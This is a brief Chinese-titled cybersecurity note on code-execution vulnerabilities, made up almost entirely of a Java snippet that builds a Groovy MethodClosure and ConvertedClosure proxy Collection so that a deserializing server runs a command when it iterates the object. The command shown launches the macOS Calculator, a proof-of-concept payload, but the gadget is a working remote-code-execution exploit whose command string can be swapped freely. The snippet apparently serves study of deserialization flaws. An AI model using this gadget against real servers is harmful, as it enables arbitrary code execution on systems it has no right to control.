网络安全

1：代码执行漏洞

可能会执行服务器的应用程序

private static final String COMMAND = "/Applications/Calculator.app/Contents/MacOS/Calculator";

private static Collection<String> makeExploitCollection() {

    //Create a mock collection with the reflection api that only implements iterator which we know will be called on the server

    MethodClosure methodClosure = new MethodClosure(COMMAND, "execute");
    ConvertedClosure iteratorHandler = new ConvertedClosure(methodClosure, "iterator");

    Collection exploitCollection = (Collection) Proxy.newProxyInstance(
            Client.class.getClassLoader(), new Class<?>[]{Collection.class}, iteratorHandler
    );

    return exploitCollection;
}